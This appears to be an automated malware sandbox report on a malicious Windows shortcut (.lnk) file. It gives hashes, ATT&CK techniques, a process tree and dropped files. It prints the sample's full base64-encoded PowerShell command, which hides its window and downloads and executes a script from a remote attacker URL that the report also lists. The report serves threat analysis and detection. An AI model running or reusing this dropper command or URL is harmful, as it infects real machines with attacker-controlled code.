0160c59880fcb8a8a805194b6ac6a93c5c4703f6b20c22083db63605030b69fc

General

Target

15b933930c44e88e9b72f37dcff21ce0_JaffaCakes118.lnk
Size

2KB
MD5

15b933930c44e88e9b72f37dcff21ce0
SHA1

ad722a3df8b8a02f215c75631652efb1585e8a61
SHA256

0160c59880fcb8a8a805194b6ac6a93c5c4703f6b20c22083db63605030b69fc
SHA512

a4882f04ba4fd80ed7993de2dbf89086d150b0c187c4287b7fc0339f34711c630f19f6ec9bb172fdce6448ec50cfdad0c263543bf46cc8c9cd1ccc2db434d957

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2668	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3512 wrote to memory of 2668	3512	cmd.exe	86
PID 3512 wrote to memory of 2668	3512	cmd.exe	86
PID 2668 wrote to memory of 412	2668	powershell.exe	87
PID 2668 wrote to memory of 412	2668	powershell.exe	87
PID 412 wrote to memory of 4700	412	csc.exe	88
PID 412 wrote to memory of 4700	412	csc.exe	88

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\15b933930c44e88e9b72f37dcff21ce0_JaffaCakes118.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3512
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en ZgBiADsAYQBkAGQALQBUAHkAUABFACAALQBOAEEATQBlACAAYQAgAC0ATQBFAG0AQgBFAFIAZABlAEYASQBuAGkAdABJAE8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAcwBQAEEAYwBFACAAQgA7AFsAYgAuAEEAXQA6ADoAUwBoAG8AVwBXAGkATgBkAG8AdwAoACgAWwBTAHkAUwBUAGUATQAuAEQASQBhAGcATgBPAFMAdABJAEMAcwAuAHAAcgBPAGMARQBzAFMAXQA6ADoARwBlAHQAYwB1AFIAUgBlAE4AdABwAFIAbwBDAGUAUwBzACgAKQAgAHwAIABQAHMAKQAuAE0AYQBpAE4AVwBpAE4AZABvAHcASABBAG4AZABMAGUALAAwACkAOwBpAEUAeAAoAG4AZQBXAC0ATwBCAGoAZQBjAHQAIABuAGUAVAAuAFcAZQBiAEMATABpAEUAbgB0ACkALgBEAE8AVwBOAGwAbwBhAGQAcwB0AFIASQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAGUAcABvAGcAeQAuAGUAcABpAGEAaQBuAC4AYwBvAG0ALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBIAE0ANgBMAHkAOQB6AFoAWABCAHYAWgAzAGsAdQBaAFgAQgBwAFkAVwBsAHUATABtAE4AdgBiAFMAOQAyAE0AbgB3ADIATgBEAGgAUgAlACcAKQA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xyngi0ue\xyngi0ue.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AF6.tmp" "c:\Users\Admin\AppData\Local\Temp\xyngi0ue\CSCE63EC21A3B6E4CACA3FED8F8EFF83AB.TMP"
      4⤵
      PID:4700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES3AF6.tmp

Filesize
1KB

MD5
048742e0051c0d6ebd0d0ece74379052

SHA1
a0cb18917d24163fc87f91545bc6acf0370eb23a

SHA256
5743bd737da1a0a522dac25f02cddabaed4f83e9eb93e8dabe780eaeb6311bb1

SHA512
d11590496e7ae23f1104479d7844b1460d6866331575f6bbe9d4b5d53cb39313355ae15f4626be1e535d04df9d4d92cd7e455e06a34d4e3d130bfa38b2275c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rbw10uyw.ogp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xyngi0ue\xyngi0ue.dll

Filesize
3KB

MD5
ac72bef4f80655e1061c512ea3264389

SHA1
626c3b86c6da9a800958dbcb29ba7a427852e1b0

SHA256
c8344a8937236241557081c3b694430a9c3cf5fa2a473a1fee0461fc3f2d7e6a

SHA512
d1310a592c3f666e50e2957f53583e28b7d9c3e661c4941bcd7cb13d47f47cb91c4b950eea76fd16d734532040c684173f6cb4abd14c8146f4fcb4615946636e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xyngi0ue\CSCE63EC21A3B6E4CACA3FED8F8EFF83AB.TMP

Filesize
652B

MD5
905254d031a4562b1912cbb51dc62ff2

SHA1
8587b3b63d9ae91d92e852ddcdd759a9b85b0aad

SHA256
8f633f46a31dcdd05f97dbe5d7f1d25b1dbd5344f5d6933bfeb8b8d746282357

SHA512
e2c72797a27b24650cce3fa1e98cea7e565d759ab089d29e937ba181db2fdb9c19480a054dfd1db25bad6dda4e21b3166c410472bdcf60c976de1cee210390a7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xyngi0ue\xyngi0ue.0.cs

Filesize
187B

MD5
72adb98c3e5567127529bcef23d35336

SHA1
33d247df344b0d8c7d64106479e7d45675b9e1de

SHA256
f6d397b4c881a5b0010b46fec1d0531efaf919d3c46be3223f44ca949a6f05cd

SHA512
7af6ea40e8895ee10e28d058075cccc13ac44812b1ef5c6fb478feb46b071fcb5008553b169f5b6cbb4ea34e40885c531ff7fb804514b500fa49d97f8f627d3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xyngi0ue\xyngi0ue.cmdline

Filesize
369B

MD5
b8adbc26bb33deee4859fe603a63846d

SHA1
362a4c52ffc084eeb71c158dc5420ef27a60c77d

SHA256
9dd968eb09d5a475d360c760bd1a4e4e6c69864d771da52dd249a57464f03e0c

SHA512
3ffce2924786df686941b5ca64ebae4fe18e6c39cacf577f60e53d88b2ad255954ceebd811810a4b65c6a51e010a5953ec941c30e0171bcc3c1952d0fa614680

Download Submit
memory/2668-13-0x00007FF9EE900000-0x00007FF9EF3C1000-memory.dmp

Filesize
10.8MB

Download
memory/2668-18-0x00007FF9EE900000-0x00007FF9EF3C1000-memory.dmp

Filesize
10.8MB

Download
memory/2668-15-0x00007FF9EE900000-0x00007FF9EF3C1000-memory.dmp

Filesize
10.8MB

Download
memory/2668-14-0x00007FF9EE900000-0x00007FF9EF3C1000-memory.dmp

Filesize
10.8MB

Download
memory/2668-2-0x00007FF9EE903000-0x00007FF9EE905000-memory.dmp

Filesize
8KB

Download
memory/2668-29-0x00000280C83D0000-0x00000280C83D8000-memory.dmp

Filesize
32KB

Download
memory/2668-12-0x00000280C8360000-0x00000280C8382000-memory.dmp

Filesize
136KB

Download
memory/2668-33-0x00007FF9EE900000-0x00007FF9EF3C1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing